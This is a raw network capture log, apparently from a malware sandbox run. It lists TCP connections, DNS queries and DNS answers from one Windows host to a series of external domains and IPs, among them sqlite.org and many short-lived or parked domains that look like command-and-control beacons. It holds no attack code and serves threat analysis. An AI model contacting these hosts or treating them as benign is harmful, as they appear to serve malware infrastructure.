                                                                                            May 2, 2024 08:27:02.692632914 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.692645073 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.692657948 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.692686081 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.692713022 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.692753077 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.823872089 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.823898077 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.823966980 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824022055 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824064016 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824094057 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824143887 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824172020 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824198008 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824218988 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824230909 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824279070 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824321985 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824331045 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824368954 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824398994 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824443102 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824470043 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824517012 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824542046 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824584007 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824611902 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824654102 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824656010 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824696064 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824712992 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824755907 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824760914 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824805021 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824811935 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824841976 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824887991 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824918985 CEST804916545.33.6.223192.168.2.22
                                                                                            May 2, 2024 08:27:02.824942112 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:27:02.824959040 CEST4916580192.168.2.2245.33.6.223
                                                                                            May 2, 2024 08:28:11.458373070 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458434105 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458465099 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:11.458558083 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458573103 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458609104 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458610058 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:11.458630085 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:11.458674908 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458690882 CEST8049178198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:11.458713055 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:11.458729029 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:13.381984949 CEST4917880192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.259818077 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.419368982 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.419434071 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.419702053 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.578496933 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663295031 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663326979 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663345098 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663357973 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663369894 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.663378000 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663393974 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663395882 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.663409948 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663425922 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663425922 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.663444042 CEST8049179198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:18.663460016 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:18.663476944 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:19.931579113 CEST4917980192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:20.944144964 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.099862099 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.103780985 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.107579947 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.263326883 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.263398886 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.263585091 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.419118881 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.419140100 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503128052 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503161907 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503180027 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503211021 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503254890 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503264904 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503299952 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503334045 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503359079 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503427982 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:21.503511906 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503526926 CEST8049180198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:21.503653049 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:22.613553047 CEST4918080192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.627830982 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.783396006 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.784087896 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.793699026 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.949213028 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.986429930 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.986607075 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:23.987026930 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:23.987026930 CEST4918180192.168.2.22198.12.241.35
                                                                                            May 2, 2024 08:28:24.142529011 CEST8049181198.12.241.35192.168.2.22
                                                                                            May 2, 2024 08:28:32.044791937 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.322665930 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:32.322730064 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.325015068 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.604260921 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:32.604337931 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:32.882160902 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182195902 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182224035 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182275057 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.182297945 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182352066 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182384968 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.182432890 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182449102 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.182483912 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.183585882 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.183603048 CEST8049182183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:33.183644056 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:33.829627037 CEST4918280192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:34.849589109 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.127321005 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.127388954 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.127638102 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.405409098 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684334993 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684401035 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684448004 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.684550047 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684637070 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684652090 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684669018 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.684669018 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.684701920 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:35.686428070 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.686443090 CEST8049183183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:35.686477900 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:37.396697044 CEST4918380192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.421503067 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.718143940 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:38.718277931 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:38.723397017 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.020237923 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.020271063 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.020313978 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.317635059 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.597989082 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598010063 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598062038 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598072052 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598154068 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598165989 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598189116 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598203897 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598491907 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598534107 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:39.598562956 CEST8049184183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:39.598606110 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:40.225678921 CEST4918480192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.239900112 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.519207001 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:41.519541979 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.519541979 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:41.798891068 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050122976 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050144911 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:42.050339937 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:42.050339937 CEST4918580192.168.2.22183.111.183.31
                                                                                            May 2, 2024 08:28:42.329355955 CEST8049185183.111.183.31192.168.2.22
                                                                                            May 2, 2024 08:28:47.181792021 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.335211992 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.335294008 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.335522890 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.488799095 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.488821030 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.488858938 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:47.642158031 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827896118 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827924013 CEST804918667.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:47.827981949 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:48.928070068 CEST4918680192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.465487957 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.618884087 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.618962049 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.619167089 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:56.773029089 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909734964 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909780979 CEST804918767.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:56.909838915 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:58.121702909 CEST4918780192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.149621010 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.304112911 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.305978060 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.305978060 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.460000038 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.463784933 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:28:59.618105888 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758326054 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758363962 CEST804918867.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:28:59.758550882 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:00.817698002 CEST4918880192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.833782911 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.990781069 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:01.993967056 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:01.993967056 CEST4918980192.168.2.2267.223.117.189
                                                                                            May 2, 2024 08:29:02.152143955 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288319111 CEST804918967.223.117.189192.168.2.22
                                                                                            May 2, 2024 08:29:02.288368940 CEST804918967.223.117.189192.168.2.22
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                            May 2, 2024 08:28:06.062151909 CEST138138192.168.2.22192.168.2.255
                                                                                            May 2, 2024 08:28:10.821413994 CEST6267253192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:10.923126936 CEST53626728.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:28:31.427584887 CEST5647553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:32.003340006 CEST53564758.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:28:47.050195932 CEST4938453192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:28:47.181309938 CEST53493848.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:08.487246990 CEST5484253192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:08.749180079 CEST53548428.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:26.939393997 CEST5810553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:27.634426117 CEST53581058.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:41.929637909 CEST6492853192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:42.028947115 CEST53649288.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:43.033849955 CEST5739053192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:43.135082006 CEST53573908.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:44.140249014 CEST5809553192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:44.240052938 CEST53580958.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:45.251631021 CEST5426153192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:45.350110054 CEST53542618.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:29:50.348968983 CEST6050753192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:29:50.478497982 CEST53605078.8.8.8192.168.2.22
                                                                                            May 2, 2024 08:30:03.719363928 CEST5044653192.168.2.228.8.8.8
                                                                                            May 2, 2024 08:30:03.932369947 CEST53504468.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 2, 2024 08:26:08.124651909 CEST | 192.168.2.22 | 8.8.8.8 | 0xc13a | Standard query (0) | universalmovies.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:51.505460024 CEST | 192.168.2.22 | 8.8.8.8 | 0x7f30 | Standard query (0) | www.besthomeincome24.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:56.611654997 CEST | 192.168.2.22 | 8.8.8.8 | 0x702f | Standard query (0) | www.terelprime.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:01.625319958 CEST | 192.168.2.22 | 8.8.8.8 | 0xd00d | Standard query (0) | www.sqlite.org | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:11.997076988 CEST | 192.168.2.22 | 8.8.8.8 | 0x9223 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:15.394332886 CEST | 192.168.2.22 | 8.8.8.8 | 0x1442 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:18.795037031 CEST | 192.168.2.22 | 8.8.8.8 | 0xd049 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:22.278522015 CEST | 192.168.2.22 | 8.8.8.8 | 0xe68 | Standard query (0) | www.99b6q.xyz | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:29.671816111 CEST | 192.168.2.22 | 8.8.8.8 | 0xbad2 | Standard query (0) | www.kinkynerdspro.blog | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:43.305377007 CEST | 192.168.2.22 | 8.8.8.8 | 0xf4cb | Standard query (0) | www.xn--matfrmn-jxa4m.se | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.114625931 CEST | 192.168.2.22 | 8.8.8.8 | 0x3b08 | Standard query (0) | www.primeplay88.org | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:10.821413994 CEST | 192.168.2.22 | 8.8.8.8 | 0x7a6a | Standard query (0) | www.aceautocorp.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:31.427584887 CEST | 192.168.2.22 | 8.8.8.8 | 0x4557 | Standard query (0) | www.mrart.co.kr | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:47.050195932 CEST | 192.168.2.22 | 8.8.8.8 | 0x42ea | Standard query (0) | www.touchclean.top | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:08.487246990 CEST | 192.168.2.22 | 8.8.8.8 | 0x1bd8 | Standard query (0) | www.ibistradingco.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:26.939393997 CEST | 192.168.2.22 | 8.8.8.8 | 0x6bb2 | Standard query (0) | www.jnkinteractive.co.kr | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:41.929637909 CEST | 192.168.2.22 | 8.8.8.8 | 0x1486 | Standard query (0) | www.chrisdomond.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:43.033849955 CEST | 192.168.2.22 | 8.8.8.8 | 0xd063 | Standard query (0) | www.chrisdomond.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:44.140249014 CEST | 192.168.2.22 | 8.8.8.8 | 0xa6bb | Standard query (0) | www.chrisdomond.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:45.251631021 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | www.chrisdomond.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:50.348968983 CEST | 192.168.2.22 | 8.8.8.8 | 0xd9b1 | Standard query (0) | www.riveramayahousing.com | A (IP address) | IN (0x0001) | false
May 2, 2024 08:30:03.719363928 CEST | 192.168.2.22 | 8.8.8.8 | 0xd026 | Standard query (0) | www.exclaimer342200213.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 2, 2024 08:26:08.222877026 CEST | 8.8.8.8 | 192.168.2.22 | 0xc13a | No error (0) | universalmovies.top |  | 104.21.74.191 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:08.222877026 CEST | 8.8.8.8 | 192.168.2.22 | 0xc13a | No error (0) | universalmovies.top |  | 172.67.162.95 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:51.608325005 CEST | 8.8.8.8 | 192.168.2.22 | 0x7f30 | Name error (3) | www.besthomeincome24.com | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:26:56.775614023 CEST | 8.8.8.8 | 192.168.2.22 | 0x702f | No error (0) | www.terelprime.com |  | 66.96.161.166 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:01.725507021 CEST | 8.8.8.8 | 192.168.2.22 | 0xd00d | No error (0) | www.sqlite.org |  | 45.33.6.223 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:12.094806910 CEST | 8.8.8.8 | 192.168.2.22 | 0x9223 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:15.493933916 CEST | 8.8.8.8 | 192.168.2.22 | 0x1442 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:18.893646002 CEST | 8.8.8.8 | 192.168.2.22 | 0xd049 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:22.374011993 CEST | 8.8.8.8 | 192.168.2.22 | 0xe68 | Name error (3) | www.99b6q.xyz | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:29.855329990 CEST | 8.8.8.8 | 192.168.2.22 | 0xbad2 | No error (0) | www.kinkynerdspro.blog |  | 94.23.162.163 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:43.612377882 CEST | 8.8.8.8 | 192.168.2.22 | 0xf4cb | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.86 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:43.612377882 CEST | 8.8.8.8 | 192.168.2.22 | 0xf4cb | No error (0) | www.xn--matfrmn-jxa4m.se |  | 194.9.94.85 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:27:57.229892015 CEST | 8.8.8.8 | 192.168.2.22 | 0x3b08 | No error (0) | www.primeplay88.org | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:27:57.229892015 CEST | 8.8.8.8 | 192.168.2.22 | 0x3b08 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:10.923126936 CEST | 8.8.8.8 | 192.168.2.22 | 0x7a6a | No error (0) | www.aceautocorp.com | aceautocorp.com |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:28:10.923126936 CEST | 8.8.8.8 | 192.168.2.22 | 0x7a6a | No error (0) | aceautocorp.com |  | 198.12.241.35 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:32.003340006 CEST | 8.8.8.8 | 192.168.2.22 | 0x4557 | No error (0) | www.mrart.co.kr | mrart.co.kr |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:28:32.003340006 CEST | 8.8.8.8 | 192.168.2.22 | 0x4557 | No error (0) | mrart.co.kr |  | 183.111.183.31 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:28:47.181309938 CEST | 8.8.8.8 | 192.168.2.22 | 0x42ea | No error (0) | www.touchclean.top |  | 67.223.117.189 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:08.749180079 CEST | 8.8.8.8 | 192.168.2.22 | 0x1bd8 | No error (0) | www.ibistradingco.com | www.ibistradingco.com.cdn.hstgr.net |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:29:08.749180079 CEST | 8.8.8.8 | 192.168.2.22 | 0x1bd8 | No error (0) | www.ibistradingco.com.cdn.hstgr.net |  | 154.41.250.58 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:27.634426117 CEST | 8.8.8.8 | 192.168.2.22 | 0x6bb2 | No error (0) | www.jnkinteractive.co.kr | jnkinteractive.co.kr |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:29:27.634426117 CEST | 8.8.8.8 | 192.168.2.22 | 0x6bb2 | No error (0) | jnkinteractive.co.kr |  | 183.111.183.31 | A (IP address) | IN (0x0001) | false
